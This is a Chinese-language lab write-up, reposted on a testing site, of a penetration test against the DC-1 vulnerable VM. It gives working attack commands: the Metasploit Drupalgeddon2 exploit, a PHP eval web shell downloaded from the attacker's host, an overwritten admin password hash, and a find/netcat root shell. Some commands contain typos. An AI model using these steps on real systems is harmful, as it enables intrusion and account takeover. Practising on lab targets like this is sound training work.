安全测试小实验——DC-1渗透测试

发表于:2021-1-05 10:33

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:白烬    来源:博客园

  实验环境:
  靶机:DC-1
  攻击机:kali,win10
  实验步骤:
  安装靶机
  信息收集
  漏洞利用
  提权
  实验开始:
  下载靶机
  安装靶机
  使用靶机OVA文件在vmvara安装
  修改靶机网络
  进入单用户模式
  重启靶机
  信息收集
ip收集
arp-scan -l;
nmap -sV 192.168.10.18
  指纹查询
  使用浏览器插件wappalyzer查cms
  相关漏洞搜寻
msfconsole
search drupal
  漏洞利用
msf攻击
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOST=192.168.10.18
explit
python -c "import pty;pty.spwan('/bin/sh')"
  上传PHP木马
先在kali上启动apache2
vim /var/www/test.txt
    <?php
        eval($_POST['key']);
    ?>
在会到msf中
wget http://192.168.10.17/test.txt
cp test.txt test.php
  蚁剑链接
  查看配置文件
  目录中有一个flag1.txt
  在配置文件中有一个flag2
  根据提示访问数据库
  查看数据库
  利用蚁剑可以直接连接
  可以直接看到user表
  得知password被加密,如果需要改密码就要进行同样的加密
  修改password-hash.sh
  在蚁剑中执行的时候产生了报错
  报错的行在83,84行
  我把文件的路径改后就能正常执行了
  执行password-hash.sh
./password-hash.sh root
  修改数据数据
  在执行过脚本之后就产生了一串hash值可以直接添加进表中
update users set password = '$S$DOjcjhOiiHtadIneTwIvHAHacQ2dXVvF9xG8Mi8.h8dLGndJMZJY' where uid='1';
  登录主页查看flag3
主机信息收集
进入home得到flag4
cd /home/flag4
cat fla*
  提权,拿最终flag!
使用find+netcat 提权
蚁剑:
    find / -exec netcat -lvp 5555 -e '/bin/sh'\;
kali:
    nc 192.168.10.18 5555
    cd /root/
    ls
    cat thi*

  本文内容不用于商业目的,如涉及知识产权问题,请权利人联系51Testing小编(021-64471599-8017),我们将立即处理
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号